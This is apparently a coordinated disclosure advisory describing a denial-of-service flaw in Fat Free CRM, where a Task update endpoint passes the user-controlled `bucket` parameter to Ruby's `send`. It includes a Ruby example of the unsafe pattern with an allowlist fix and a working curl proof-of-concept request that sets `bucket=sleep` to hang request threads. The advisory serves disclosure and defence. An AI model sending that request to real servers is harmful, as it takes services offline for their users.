Coordinated Disclosure Timeline
- 2022-09-07: Sent report to Fat Free CRM maintainers
- 2022-09-12: Maintainers acknowledged the existence of this vulnerability and started looking for similar vulnerabilities
- 2022-10-07: Advisory was published
A denial of service vulnerability existed in Fat Free CRM where an authenticated attacker could have prevented the web application from handling any requests.
Fat Free CRM
Issue: Remote Denial of Service
An authenticated user can perform a remote Denial of Service attack against Fat Free CRM. Fat Free CRM exposes several Task update endpoints that pass `params[:bucket]` to the `bucket_empty?` method, which calls `send` with the user-controllable `bucket` parameter as argument. Ruby's `send` method calls any private or public method on an object, including methods defined on parent classes such as `Kernel`. The `Kernel` module is included by the class `Object`, so its methods are available in every Ruby object.
Most public information about this type of vulnerability mentions Kernel methods such as `exit!` as destructive examples to pass to the `send` method. However, in a Rails application this throws an exception and, while it shuts the current request down, it doesn't kill the server. We found that the Kernel method `sleep` might be a better candidate to stop a Rails application from answering requests: calling `sleep` without a duration parameter makes the current request thread sleep forever.
So, if a Rails application is started with a maximum of 5 threads (`RAILS_MAX_THREADS=5`) in combination with 2 Puma workers (`WEB_CONCURRENCY=2`), it will take 10 (2*5) requests to stop the Rails application from responding to any requests.
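The dispatch pattern described above, reduced to a small self-contained model, together with the allowlist-based fix a maintainer would apply. This is an added example and not Fat Free CRM's own code: the `TaskScope` class, its bucket names and the method names are assumptions made for illustration. The unsafe path is demonstrated with the harmless private `Kernel#binding` rather than `sleep`, since both are reached by exactly the same `send` call.

```ruby
# Added example (not Fat Free CRM code): user-controlled `send` versus an
# explicit allowlist. Class, method and bucket names are constructed.

class TaskScope
  # Constructed sample data: each bucket name maps to a list of task ids.
  BUCKETS = {
    "overdue"      => [1, 2],
    "due_today"    => [],
    "due_tomorrow" => [3]
  }.freeze

  # Only these names may ever be dispatched from a request parameter.
  ALLOWED_BUCKETS = BUCKETS.keys.freeze

  # Each permitted bucket becomes a public method returning its task ids.
  BUCKETS.each do |name, ids|
    define_method(name) { ids }
  end

  # Vulnerable pattern: `send` reaches ANY method of the object, public or
  # private, including Kernel methods such as `sleep` or `exit!`.
  def bucket_empty_unsafe?(bucket)
    send(bucket).empty?
  end

  # Hardened pattern: validate against the allowlist before dispatching.
  # `public_send` alone would not be enough, because Kernel also exposes
  # public methods; the allowlist is what actually bounds the reachable set.
  def bucket_empty?(bucket)
    unless ALLOWED_BUCKETS.include?(bucket)
      raise ArgumentError, "unknown bucket: #{bucket.inspect}"
    end
    public_send(bucket).empty?
  end
end

# Shows that the unsafe path reaches a private Kernel method. `binding` is
# used deliberately instead of `sleep` so the example terminates.
def unsafe_dispatch_reaches_private_kernel_method?
  TaskScope.new.send("binding").is_a?(Binding)
rescue NoMethodError
  false
end

# Shows that the hardened path refuses anything outside the allowlist.
def hardened_rejects?(bucket)
  TaskScope.new.bucket_empty?(bucket)
  false
rescue ArgumentError
  true
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe send reaches Kernel method: #{unsafe_dispatch_reaches_private_kernel_method?}"
  puts "hardened rejects 'sleep':         #{hardened_rejects?("sleep")}"
  puts "hardened 'due_today' empty?:      #{TaskScope.new.bucket_empty?("due_today")}"
end
```

The same allowlist check is also a good place to emit a log line or metric when a rejected name arrives, since a request carrying `bucket=sleep` is a clear signal of probing for this class of issue.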
This vulnerability was found using a CodeQL query which identifies code injection.
Proof of concept
The following request sets the `bucket` parameter to `sleep`, which the application passes to `send` and thereby evaluates as a call to `Kernel#sleep`:

```
curl -i -s -k -X $'PUT' \
  -H $'Host: 127.0.0.1:3000' \
  -H $'Content-Length: 14' \
  -H $'X-CSRF-Token: [..]' \
  -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36' \
  -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H $'Connection: close' \
  -b $'_fat_free_crm_session=[..]' \
  --data-binary $'bucket=sleep' \
  $'http://127.0.0.1:3000/tasks/26/complete'
```

(Hint: replace the `X-CSRF-Token` header and the `_fat_free_crm_session` cookie with valid (authenticated) values.)
This issue may lead to Denial of Service (DoS).
This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).
You can contact the GHSL team at email@example.com; please include a reference to GHSL-2022-073 in any communication regarding this issue.